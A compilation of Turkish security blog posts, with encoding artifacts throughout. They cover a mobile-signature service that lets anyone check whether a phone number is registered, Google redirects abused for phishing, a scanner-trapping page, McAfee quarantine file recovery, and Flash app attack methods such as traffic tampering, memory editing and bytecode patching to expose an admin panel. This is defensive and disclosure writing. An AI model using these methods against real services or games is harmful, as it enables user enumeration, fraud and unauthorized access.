WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

